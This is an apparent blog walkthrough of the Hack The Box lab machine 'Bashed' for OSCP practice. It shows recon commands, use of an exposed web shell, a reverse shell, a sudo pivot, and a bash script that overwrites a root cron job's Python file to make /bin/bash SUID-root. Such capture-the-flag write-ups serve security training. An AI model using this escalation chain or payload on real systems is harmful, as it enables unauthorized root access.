#1 — OSCP prep: HTB — Bashed

Christian Manalaysay
3 min read · Aug 23, 2021

My walkthrough of a Hack The Box retired machine.

Machine: Bashed
IP: 10.129.202.29
OS: Linux
Difficulty: Easy

Reconnaissance

Let’s start by running an Nmap scan against the target machine to find out which ports are open and what services are listening on them. The first command sweeps all 65535 TCP ports; the second runs the default scripts and version detection only against the port that sweep turns up, and saves the result to a file.

SYNTAX:
sudo nmap -T4 -v -p- 10.129.202.29
sudo nmap -T4 -sC -sV -p80 -oN nmap_bashed.txt 10.129.202.29

Figure 1.0 — Nmap port scan results

The full-port sweep shows that only port 80 (HTTP) is open. Let’s head over to the website and see what kind of information we can find.

We can see that this website talks about a web shell called phpbash, which was apparently developed on this web server. There is also a GitHub link for phpbash — https://github.com/Arrexel/phpbash.

There’s not much else we can see or do on this website, so let’s see if there are any other directories or files we can find using Gobuster.

SYNTAX:
gobuster dir -u <target URL> -w <wordlist> -x <extensions>

Figure 1.1 — Gobuster scan results

Going through the directories and files from the Gobuster scan, I noticed a phpbash.php file in the dev/ directory. Browsing to it gives us a working web shell, running with the privileges of the web server process rather than a regular user account. A development tool left reachable on the live site is all it takes for initial access.

Figure 1.2 — File misconfiguration

Privilege Escalation

Now that we have a shell on the system, let’s try to escalate our privileges and gain root access.

Before moving on, though, let’s swap this web-based shell for a more stable one. I used a PHP reverse shell payload from “PayloadsAllTheThings”, caught by a listener on my attacking machine, to give myself a more functional shell to work with.

Figure 1.3 — Improving my shell

Once I have a shell, the first thing I check is whether I can run anything with sudo (sudo -l). Here the web server account can run any command as scriptmanager with no password, so I take advantage of that and spawn a bash shell as scriptmanager.

Figure 1.4 — Spawning a bash shell as scriptmanager

Looking around the file system, I found a scripts directory belonging to scriptmanager. Inside it is a test.py file that is executed every minute: I noticed this because a text file in the same directory, which the script writes to, was being refreshed every minute. That output file is owned by root, which means root (via a scheduled job) is the one running the Python script, even though scriptmanager can edit it. That mismatch between who can write the script and who runs it is exactly what we want.

Figure 1.5 — Contents of the scripts directory

To take advantage of this, I replace the contents of the Python script with one that sets the SUID bit on /bin/bash. On the next scheduled run, root executes it and /bin/bash becomes SUID-root; launching it with bash -p (the -p flag keeps the elevated effective UID instead of dropping it back to the real UID) then gives me a root shell.

Figure 1.6 — Modifying test.py
Figure 1.7 — Becoming root
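The chain from the sudo check through to the root shell, as an added example that is not part of the original post. The user name scriptmanager and the chmod u+s /bin/bash payload follow the walkthrough; the function names, the default two-minute window and the directory argument are my own, and because the page does not give the full path of the scripts directory it is passed in rather than hard-coded. Only the file-hunting function and the payload writer run anywhere; the other two only make sense on the target.

```shell
#!/bin/bash
# Added example, not the post's own code. Function names are mine; the
# user 'scriptmanager' and the chmod u+s /bin/bash payload follow the post.

# Step 1 (Figure 1.4): sudo -l reported NOPASSWD for any command as
# scriptmanager, so switch users without a password. -n makes sudo fail
# instead of hanging on a prompt if the rule is not what we expected.
become_scriptmanager() {
    sudo -n -u scriptmanager /bin/bash -i
}

# Step 2 (Figure 1.5): reproduce the signal the post relied on. List files
# under DIR owned by OWNER (default root), modified within the last MINUTES
# minutes (default 2), that sit in a directory the current user can write
# to. A root-owned file that keeps changing inside a directory we control
# is evidence that a privileged scheduled job runs something we can edit.
find_fresh_files() {
    local dir="$1" minutes="${2:-2}" owner="${3:-root}"
    find "$dir" -type f -user "$owner" -mmin "-$minutes" 2>/dev/null |
    while IFS= read -r f; do
        if [ -w "$(dirname "$f")" ]; then
            printf '%s\n' "$f"
        fi
    done
}

# Step 3 (Figure 1.6): overwrite the script the cron job runs with a
# payload that makes bash SUID-root. Nothing is executed here; root's
# next scheduled run does the chmod for us.
write_suid_payload() {
    local target="$1"
    cat > "$target" <<'EOF'
import os
os.system("chmod u+s /bin/bash")
EOF
}

# Step 4 (Figure 1.7): once the SUID bit is on, bash -p keeps the
# effective uid 0 instead of resetting it to the real uid.
spawn_root_shell() {
    if [ ! -u /bin/bash ]; then
        echo "SUID bit not set yet; wait for the next cron run" >&2
        return 1
    fi
    /bin/bash -p
}
```

On the box the order is become_scriptmanager, then find_fresh_files against the scripts directory to confirm a root-owned file is being rewritten there, write_suid_payload on the script it points at, wait a minute, and spawn_root_shell. Note that write_suid_payload clobbers the original script; on a real engagement copy it aside first so the job can be restored, and remember to remove the SUID bit from /bin/bash when you are done.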

We successfully gained root access to the system!

Figure 1.8 — Root flag

See you on the other side coop.
